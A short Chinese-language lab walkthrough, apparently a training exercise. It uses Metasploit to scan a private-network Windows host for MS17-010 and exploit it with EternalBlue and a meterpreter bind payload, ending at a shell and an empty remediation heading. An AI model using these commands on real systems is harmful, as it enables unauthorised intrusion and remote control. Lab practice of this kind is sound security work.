攻击机:192.168.20.101
靶机:192.168.20.103
使用msf的扫描模块,扫描靶机是否存在漏洞
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.20.103
run
使用攻击载荷进行攻击
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 192.168.20.103
show options
run
进入shell
修复: